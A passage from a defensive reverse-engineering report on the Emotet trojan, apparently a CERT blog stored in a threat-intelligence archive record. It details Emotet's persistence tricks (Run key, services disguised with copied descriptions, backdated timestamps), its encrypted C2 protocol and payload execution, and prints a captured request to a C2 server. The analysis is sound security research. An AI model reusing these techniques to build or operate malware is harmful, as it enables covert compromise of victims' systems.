This technique resembles the Control Flow Flattening technique, in which each function is\r\nsplit into basic blocks that are encapsulated in a switch block wrapped in a while loop.\r\nFigure 31. Emotet trojan’s Control Flow Obfuscation\r\nThis technique is also applied to the vast majority of the functions in the executable.\r\nWe were aware of techniques to automatically de-obfuscate control flow flattening (e.g. the technique described in\r\nthis quarkslab blog post), but since the size of the code was small enough we decided to follow the flow manually.\r\nChapter 4. The trojan’s internals\r\nIntroduction\r\nIn the previous chapter we had a look at the trojan executable. We identified several obfuscation techniques\r\nincorporated in the executable and described the methods we used to overcome them. In this chapter, we will\r\ndiscuss the trojan’s inner functionalities.\r\nMain flow overview\r\nWe followed a depth-first approach to reverse engineer the executable. We started from the function\r\nFUN_0406860() , the one called by the executable’s entry-point, which we called “main”.\r\nFigure 32. Emotet trojan’s entry-point\r\nThen, we followed the flow examining each function call. We did this until we reached a function that either made\r\nno further calls or only invoked already examined functions. After a couple of weeks we had completely studied\r\nthe executable’s code.\r\nAs a result, we were able to draw the code flow of the main function in a meaningful manner. Below, we present\r\nthe main control loop of the trojan:\r\nFigure 33. 
Emotet trojan’s main function flow chart\r\nThe basic groups of states are highlighted:\r\nGrey states: Initialization of internal variables.\r\nPurple states: Persistence-related operations (running during the first run of the trojan or after\r\ncommunicating with the C2 network).\r\nGreen states: Initialization of parameters related to the communication with the C2 network.\r\nBlue states: Initialization of static data to be included in requests to the C2 network.\r\nOrange states: Re-initialization of variable data to be included in the next request to the C2 network.\r\nRed states: Communication with the chosen C2 server.\r\nYellow state: Handling of the C2 server’s response.\r\nInitially, the trojan loads the required libraries (states 1 and 2) and initializes its internal variables (state 3).\r\nThen, it checks whether it was started with command line arguments or not (state 4). The existence of command line\r\narguments indicates that this is the first run of a self-update. The command line arguments contain the file path\r\nto which the executable has to migrate. In that case, states 8-13 perform a series of actions related to the\r\npersistence of the trojan. Specifically, any existing file in the target file-path is renamed (state 8), the current\r\nexecutable is stored in the target file-path and its Zone Identifier ADS is removed (state 9). The created file is\r\nmarked as “old” by changing its timestamps (state 10). If the process runs with administrative permissions, a new\r\nService for the executable is created (state 11). Then, it waits until it receives a signal from its parent process (state\r\n12). Finally, it runs itself from the newly created executable (state 13).\r\nIf command line arguments are absent, it is either the first run after the Protector extracted the trojan or\r\na later run. This is inferred by checking the executable’s timestamp (state 5). 
If it is indeed a first run,\r\nany existing Services for the executable are removed provided that the executable has administrative permissions\r\n(state 6), and then a random legitimate-looking file-path is picked as the target for the executable file (state 7).\r\nThen, states 8-13 run, performing the series of actions described earlier.\r\nIf it is not a first run (indicated by an “old” timestamp) and the trojan runs with administrative permissions, it\r\nchecks whether its parent process name is “ services.exe ” (state 14). If so, it runs itself in a new process (state\r\n13) and terminates the current process.\r\nFinally, if this is not the first run (indicated by an “old” timestamp), and the trojan runs without administrative\r\nrights or its parent process name is not “ services.exe ”, the C2 communication flow happens. First, a new\r\nthread that monitors the changes of the current process’ executable filename is started (state 15). Then the control\r\nreaches state 16 and always returns to it until the current process’ executable filename changes. That will be the\r\nresult of a self-update and after that, the trojan will wait for any threads to terminate (state 39) and then will\r\nterminate its process.\r\nWhile no changes of the filename are detected, the trojan will repeatedly communicate with C2. First, the C2\r\ncommunication parameters are initialized once (states 17-20). Furthermore, the request data regarding the host\r\nsystem information are also initialized once (states 21-26). On each communication attempt, the list of the\r\nprocesses currently running on the system as well as the list of active payload IDs will be included in the request\r\n(states 27-28). Then the actual communication with C2 is performed (states 29-31). Upon a successful\r\ncommunication the trojan will first check if a termination flag was received. 
In that case it will immediately move\r\nits executable to the Temp folder and terminate itself (state 38). Otherwise, any existing files in the folder\r\ncontaining the trojan’s executable are deleted and a new auto-run Registry Key is created (state 32). Then, the\r\ntrojan will loop over the received payloads and execute them (state 33).\r\nIn the rest of the chapter we will focus on two main functionalities of the trojan, the persistence mechanisms and\r\nthe communication with the Command-and-Control servers.\r\nPersistence mechanisms\r\nThe trojan treats a run as its first run if it is either started with command line arguments or the LastWriteTime of its\r\nexecutable file is less than 8 days old. The timestamp is retrieved by calling\r\nGetFileInformationByHandleEx() on a handle to the file whose path is returned by GetModuleFileNameW() .\r\nUpon its first run, the trojan places its executable file in a sub-folder inside one of the following Windows Special\r\nFolders:\r\nCSIDL_LOCAL_APPDATA (usually C:\\Users\\username\\AppData\\Local ) if the trojan runs without\r\nadministrator rights, or\r\nCSIDL_SYSTEMX86 (usually C:\\Windows\\SysWOW64 ) if the trojan runs with administrator rights.\r\nThe names of the sub-folder and of the malware’s file depend on whether the executable was run\r\nwith command line arguments or not:\r\nWith no command line parameters, the malware chooses two random files from the legitimate executable\r\n(.exe) and library (.dll) files contained in the CSIDL_SYSTEM (usually C:\\Windows\\System32 ) folder. The\r\nnames of these randomly chosen files are used to define the name of the sub-folder that the malware will be\r\nstored in, as well as the filename that the trojan will be stored with inside this sub-folder.\r\nWhen invoked with command line parameters, the sub-folder name and filename for the malware are\r\nparsed from the base64-encoded command line argument. 
The structure of the base64-decoded command\r\nline argument is described in detail in the Response Payload section.\r\nFurthermore, the trojan deletes the corresponding Zone.Identifier Alternate Data Stream (which is added by the web\r\nclient to mark files downloaded from external sites as possibly unsafe to run).\r\nFinally, all the timestamp attributes of the file ( CreationTime, LastAccessTime, LastWriteTime and\r\nChangeTime ) are set to 8 days in the past. In this way, the next time the malware runs, it will be aware that it is not\r\nthe first time.\r\nTo achieve persistence, two different methods are used:\r\n1. Registry Key: Upon receiving a C2 response, it creates a value under\r\nthe HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run registry key. The value type\r\nis String ( REG_SZ , 0x1 ), its name is the filename of the trojan and its data is the full path inside the\r\nWindows Special Folder.\r\n2. System Service: Upon its first run, if running with administrator rights, it creates a new Service. The\r\nService type is SERVICE_WIN32_OWN_PROCESS ( 0x10 ) and its binary path is the full path inside the\r\nWindows Special Folder. Once the service is created, it picks a random legitimate service from the list\r\nreturned by EnumServicesStatusExW() and copies its description to the malicious service, using\r\nQueryServiceConfig2W() and ChangeServiceConfig2W() respectively, making it difficult to distinguish\r\nfrom legitimate services.\r\nCommand-and-Control\r\nAfter achieving persistence, the trojan tries to communicate with one of the Command and Control (C2) servers to\r\ninform it about the compromised system and retrieve the payloads to execute. Emotet’s C2 network consists of\r\nmultiple C2 servers with different C2 servers having different up-times, achieving redundancy and lowering the\r\nprobability of detection. 
In total, we identified 126 unique C2 servers spread all over the world, mainly located in\r\nEurope, the Americas and south-east Asia:\r\nFigure 34. Emotet’s Command-and-Control server locations\r\nThe trojan binaries come with the list of IPv4 addresses and ports of all C2 servers embedded. The C2 servers are\r\ntried sequentially, until one responds successfully. On the first run, the trojan starts from the first C2 server of the\r\nlist. On all subsequent runs, it continues from the last C2 server that responded successfully. We again wrote a\r\nshort script to automatically extract the IPv4 addresses and ports from the binaries, which can be found in\r\nextract_c2_socket_addresses.py. Finally, all C2 servers share a common private key which is used for protecting\r\nthe communication between the trojan and the C2 server. The public key is also embedded in the trojan binaries,\r\nalbeit encrypted.\r\nData exchange between the trojan and the C2 server utilizes a complex serialization and deserialization\r\nmechanism, which includes compression and encryption of both the request and response data. The actual\r\ncommunication takes place over plain HTTP, presumably to evade protections based on flagged TLS certificates.\r\nDuring the trojan’s initialization phase, the C2’s RSA-768 public key is decrypted (using the decryption function\r\ndescribed in the previous chapter) and a random AES-128 session key is generated (using the Windows Crypto\r\nAPI). The public key is used to encrypt the session key and to verify the response, while the session key is used to encrypt the\r\nrequest and decrypt the response. The encrypted session key is included in the request so that the C2 server can\r\ndecrypt the request payload. Finally, SHA-1 is used for hashing.\r\nThe primitive data types used in the exchanged messages are the byte , the char and the uint (32-bit). 
The\r\nnon-primitive data types are struct Bytes and struct String , as shown in the following code snippet:\r\nstruct Bytes {\r\n byte *buffer;\r\n uint size;\r\n};\r\n \r\nstruct String {\r\n char *buffer;\r\n uint length;\r\n};\r\nAll primitive data types are serialized in little-endian byte order. A struct Bytes is serialized to the size of the\r\nbuffer followed by the actual bytes of the buffer. A struct String is serialized to the length of the string\r\nfollowed by the characters of the string, excluding the null terminator.\r\nRequest Payload\r\nThe trojan uses information gathered from the compromised system to assemble the request payload. This\r\nincludes information that can be used to uniquely identify the system, information about the operating system and\r\nthe running processes as well as the current state of the trojan itself. Upon analyzing the binary, we concluded that\r\nthe structure of the request payload as used internally by the trojan is the following:\r\nstruct RequestPayload {\r\n struct String systemId;\r\n uint systemInfo;\r\n uint rdpSessionId;\r\n uint date;\r\n uint value_1000;\r\n struct String otherProcessExecutableNames;\r\n struct Bytes payloadIds;\r\n uint currentProcessExecutablePathHash;\r\n};\r\nThe request payload struct is serialized to the serialized request payload by serializing and concatenating its fields\r\nin the order they appear, as shown in the image below.\r\nFigure 35. Emotet’s serialized request payload\r\nsystemId\r\nThe ID assigned to the compromised system. It is constructed using the format string %s_%08X , where the first\r\nspecifier corresponds to the computer name and the second specifier to the volume serial number of the disk\r\npartition where Windows is installed. To get the computer name, GetComputerNameA() is used. 
To get the\r\nvolume serial number, GetWindowsDirectoryW() is used to get the drive letter of the partition where Windows is\r\ninstalled and then GetVolumeInformationW() is utilized to get the volume serial number of that partition. Non-letter and non-digit characters in the computer name are replaced by the character X . For example, for the\r\ncompromised system with computer name DESKTOP-K1C601 and volume serial number B4A6-FEC6 the value of\r\nsystemId would be DESKTOPXK1C601_B4A6FEC6 .\r\nsystemInfo\r\nA numeric value that encodes information regarding the OS and the architecture of the compromised system. The\r\ntrojan uses RtlGetVersion() and GetNativeSystemInfo() to get the OSVERSIONINFOEXW and SYSTEM_INFO\r\nstructures, respectively. The numeric value is constructed as shown below:\r\nOSVERSIONINFOEXW.wProductType * 100000 + OSVERSIONINFOEXW.dwMajorVersion * 1000 + OSVERSIONINFOEXW.dwMinorVersi\r\nFor example, the systemInfo value of 110009 means that the operating system is Windows 10 and the\r\nprocessor architecture is x64:\r\nwProductType : 1 ( VER_NT_WORKSTATION )\r\ndwMajorVersion : 10\r\ndwMinorVersion : 0\r\nwProcessorArchitecture : 9 ( PROCESSOR_ARCHITECTURE_AMD64 )\r\nrdpSessionId\r\nThe Remote Desktop Services session under which the current process is running. The trojan uses\r\nGetCurrentProcessId() to get the current process ID and ProcessIdToSessionId() to convert the process ID\r\nto the RDP session ID.\r\ndate\r\nThe value 20200416 is hardcoded in the request payload, which can presumably be decoded to the date April 16,\r\n2020. This could be the date that the current campaign started; however, this cannot be confirmed.\r\nvalue_1000\r\nThe value 1000 is hardcoded in the request payload. 
Its purpose is unknown.\r\notherProcessExecutableNames\r\nA comma-separated list of the names of all processes running in the system, except for the current and the parent\r\nprocesses. The trojan uses CreateToolhelp32Snapshot() to take a snapshot of all processes in the system and\r\nProcess32FirstW() / Process32NextW() to iterate over them. The current and the parent processes are filtered\r\nout. For example:\r\nSearchFilterHost.exe,SearchProtocolHost.exe,Taskmgr.exe,conhost.exe,PowerShell.exe,notepad.exe,dllhost.exe,...\r\npayloadIds\r\nThe IDs of the payloads received from the C2 server that are currently running. To support this functionality, the\r\nC2 server assigns an ID to every payload and the trojan maintains an in-memory list of the active payloads. Using\r\nthis value, the C2 server is informed about the payloads that are currently running. The list of IDs is represented as\r\nan array of unsigned integers. For example, if the payloads with IDs 2643 , 2647 , and 2759 are currently\r\nrunning, the value of payloadIds would be:\r\n53 0a 00 00 57 0a 00 00 c7 0a 00 00\r\ncurrentProcessExecutablePathHash\r\nThe hash of the full path of the current process’ executable, lower-cased. The trojan uses GetModuleFileNameW()\r\nto get the path and a custom hash function to hash the path, the reverse engineered version of which can be found\r\nin hashLowercase.c. For example, if the path of the trojan’s executable was\r\nC:\\Users\\IEUser\\AppData\\Local\\dxdiag\\reg.exe , the hash value would be 0x9f955b9 .\r\nRequest\r\nThe request encapsulates the request payload described before as well as the request flags. 
The request flags are\r\nused to specify the type of the request payload.\r\nstruct Request {\r\n uint flags;\r\n struct Bytes compressedPayload;\r\n};\r\nBefore serializing the request struct, the serialized request payload is compressed using an LZ77-style algorithm,\r\nforming the compressed request payload. The request struct’s fields are serialized in the order they appear to form\r\nthe serialized request, following again the aforementioned serialization rules.\r\nFinally, the session key is encrypted with the C2 servers’ public key (96 bytes), the serialized request is hashed (20\r\nbytes) and then encrypted with the session key to form the encrypted request. The encrypted session key, the\r\nrequest hash and the encrypted request form the request body. This is illustrated in the following image.\r\nFigure 36. Emotet’s encrypted request\r\nHTTP request-response\r\nThe trojan communicates with the C2 server over plain HTTP, using the WinINet API. In preparation for the\r\ncommunication, the trojan generates a random URL path, a random boundary for the multipart/form-data body\r\nand random field and file names for the form part to be submitted. Various headers (e.g. the Accept header) are\r\nhardcoded, while others (e.g. the User-Agent header) are system-dependent. 
Following is a sample HTTP request\r\nsent by the trojan to a C2 server:\r\nGET /3QDtL0eyVn/macjAF9/ HTTP/1.1\r\nHost: 46.101.58.37:8080\r\nCache-Control: no-cache\r\nUpgrade-Insecure-Requests: 1\r\nReferer: 46.101.58.37/\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)\r\nDNT: 1\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=---------------gby5HOqeZpTWuWuQV0Pq0e\r\nContent-Length: 5090\r\n \r\n-----------------gby5HOqeZpTWuWuQV0Pq0e\r\nContent-Disposition: form-data; name=\"iopq\"; filename=\"yyexctg\"\r\nContent-Type: application/octet-stream\r\n \r\n\u003cencrypted session key || serialized request hash || encrypted request\u003e\r\n-----------------gby5HOqeZpTWuWuQV0Pq0e--\r\nAnd the corresponding HTTP response:\r\nHTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Tue, 05 Jan 2021 18:09:55 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 87076\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\n \r\n\u003ccompressed response signature || compressed response hash || encrypted response\u003e\r\nResponse\r\nJust like the request body, the response body consists of three parts, the compressed response’s signature, the\r\ncompressed response’s hash and the encrypted response. The signature is generated by the C2 servers’ private key\r\nand the compressed response is encrypted using the session key submitted to the C2 server as part of the request.\r\nFigure 37. Emotet’s encrypted response\r\nUpon decrypting the encrypted response, the trojan retrieves a uint representing the decompressed response size\r\nfollowed by the compressed response, which can be decompressed to the serialized response using the same\r\nLZ77-style algorithm that was used to compress the request. 
Finally, the serialized response can be deserialized to\r\nthe following struct, adhering again to the common serialization rules.\r\nstruct Response {\r\n struct Bytes serializedPayload;\r\n uint flags;\r\n};\r\nThe response flags are used to inform the trojan whether to continue or terminate its operation after executing the\r\npayload.\r\nResponse Payload\r\nThe serialized response payload is a series of serialized struct Bytes , each of which contains a serialized\r\nresponse payload struct.\r\nstruct ResponsePayload {\r\n uint payloadId;\r\n uint payloadType;\r\n struct Bytes payload;\r\n};\r\nFigure 38. Emotet’s serialized response payload\r\npayloadId\r\nEvery payload has a unique ID. As discussed in the subsection about the request payload, this is used to keep track\r\nof the payloads that are being executed by each compromised system. Payload IDs are incremental integers.\r\npayloadType\r\nEach received payload is handled based on the payloadType property. There are 4 payload types:\r\nType 1 ( 0x1 ): the payload is an executable (.exe) and it is written to a file which is executed in a new\r\nprocess, using CreateProcessW() .\r\nType 2 ( 0x2 ): the payload is an executable (.exe) and it is written to a file which is executed in a new\r\nlocal user process, using CreateProcessAsUserW() .\r\nType 3 ( 0x3 ): the payload is a dynamic-link library (.dll), it is loaded into the address space of the trojan’s\r\nprocess by a custom loader (similar to those discussed in previous chapters) and then its entry-point is\r\ncalled in a new thread, using CreateThread() .\r\nType 4 ( 0x4 ): the payload is an executable (.exe) and it is written to a file which is executed in a new\r\nprocess, using CreateProcessW() , with command line arguments.\r\nFor types 1, 2 and 4, the file is stored in the same directory where the executable of the trojan resides. 
Its filename is\r\ngenerated by concatenating the name without the extension of a random .exe or .dll file in the CSIDL_SYSTEM\r\n( C:\\Windows\\System32 ) directory, the payload ID in a hexadecimal format ( %x ) and the “ .exe ” extension.\r\nFor type 3, the entry-point is called with a non-standard reason ( 10 ) and the reserved argument is a pointer to a\r\nstruct with the system ID and the C2 servers’ public key in DER format, as shown below.\r\nstruct DllArgs {\r\n char *systemId;\r\n struct Bytes c2PublicKeyDer;\r\n};\r\nFor type 4, the executable is called with a single command line argument, which is a base64-encoded serialized\r\nstruct with a handle to the calling process and the parent directory and name of the calling process’ executable, as\r\nshown below. This type is used for updating Emotet to newer versions.\r\nstruct CmdLineArgs {\r\n HANDLE *hProcess;\r\n WCHAR *directoryAndFilenameWithoutExtension;\r\n DWORD directoryAndFilenameWithoutExtensionLength;\r\n};\r\npayload\r\nThe actual data of the payload.\r\nChapter 5. Monitoring the updates\r\nIntroduction\r\nIn the previous chapter we thoroughly described the internals of the trojan. Having a good understanding of the\r\ncommunication protocol between the trojan and the C2 network we could now communicate with any C2 server,\r\nposing as an instance of the trojan. In this final chapter we show the custom client that we developed in order to\r\ncommunicate with the C2 servers with arbitrary requests and describe the responses that we received.\r\nFurthermore, we briefly describe how we used the Ghidra Scripting API in order to automate repeated processes\r\nof reverse-engineering which proved to be helpful for extracting useful information out of the received update\r\npayloads (e.g. 
new IP addresses of the C2 network).\r\nDeveloping a custom “Emotet” client\r\nWe have already described the communication between the trojan instances and the C2 network, including the\r\ndetection of the C2 servers, the structure of the requests and responses as well as the compression and encryption\r\nalgorithms. Based on this analysis we could develop our own Emotet client, which allowed us to perform requests\r\nwith arbitrary request payloads. Like the rest of the scripts, the client was implemented in Python. The source\r\ncode can be found in client.py. Using this client, we could monitor the uptime of each of the listed C2 servers and\r\nparse the C2 responses.\r\nMost of the C2 responses were loadable DLL extensions to the trojan (type 3). The payloads received from\r\ndifferent C2 servers at the same point in time were identical or almost identical, differing only in the first 48 bytes\r\nof the read-only data section. Some of the payloads were obfuscated using variations of the techniques described\r\nin Chapter 3, while others were not. The only update (type 4) that we received during our analysis was Europol’s\r\nclean-up client.\r\nAccording to the collected statistics, only a fraction of the C2 servers were online at any given time. The set of active C2\r\nservers was changing over time, presumably to avoid triggering alerts and being detected.\r\nAutomating repeated reverse-engineering processes\r\nOn each received payload we had to repeat the processes that we followed to overcome the incorporated\r\nobfuscation techniques. Since these techniques were slightly different for each payload (e.g. different XOR keys\r\nwere used, algorithm constants were modified, variables were stored in different memory addresses, etc.) we had\r\nto develop some pieces of code implementing some basic logic. 
We used the Ghidra scripting API and developed\r\nPython scripts that automated repeated processes that required considerable manual effort. Specifically, the two\r\nmain processes that were automated are the decryption of the strings and the resolution of the imported symbols.\r\nThese basic automations made the analysis of the received updates significantly easier. Implementations of the\r\nalgorithms can also be found in decrypt_bytes.py and generate_symbol_hashes2.py.\r\nEpilogue\r\nIn this analysis we documented our defensive strategy against a large trojan-spreading campaign. Our approach\r\nwas based on static analysis and reverse engineering. We initially avoided running any of the trojan’s stages. This\r\nwas an intentional choice because with dynamic analysis certain conditions and corner cases might not have been\r\ntriggered and whole code paths could have been skipped. After many hours of reverse engineering and building\r\nenough confidence that we had a full understanding of the trojan’s inner workings, we used dynamic\r\ninstrumentation to confirm our observations. For the latter we used the Frida dynamic instrumentation toolkit.\r\nNevertheless, as shown by our work, the dynamic analysis of malware is not always required in order to\r\nunderstand and analyze its functionality.\r\nNotice that in this analysis we only focused on analyzing the trojan itself and intentionally skipped the analysis of\r\npayloads spread by the C2 network. From the analysis of the trojan’s internals in Chapter 4, it became apparent\r\nthat Emotet enables the C2 servers to run arbitrary payloads on infected computers. 
It is known that Emotet had\r\nbeen used in order to spread banking-related malware, e-mail harvesting malware, as well as ransomware.\r\nHowever, analyzing those payloads was considered out of the scope of planning a generic defense against Emotet.\r\nFinally, we did not include any analysis of the last payload that our update-monitoring infrastructure received,\r\nwhich according to our observations and combined with public reports is Europol’s clean-up payload.\r\nWe hope that IT Security professionals will find our work useful for defending against similar malware in the\r\nfuture.\r\nSource: https://cert.grnet.gr/en/blog/reverse-engineering-emotet/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cert.grnet.gr/en/blog/reverse-engineering-emotet/"
	],
	"report_names": [
		"reverse-engineering-emotet"
	],
	"threat_actors": [],
	"ts_created_at": 1775434398,
	"ts_updated_at": 1775791297,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/075b2620cdc687cb3b82d4eb438c3f3a9a97667d.pdf",
		"text": "https://archive.orkl.eu/075b2620cdc687cb3b82d4eb438c3f3a9a97667d.txt",
		"img": "https://archive.orkl.eu/075b2620cdc687cb3b82d4eb438c3f3a9a97667d.jpg"
	}
}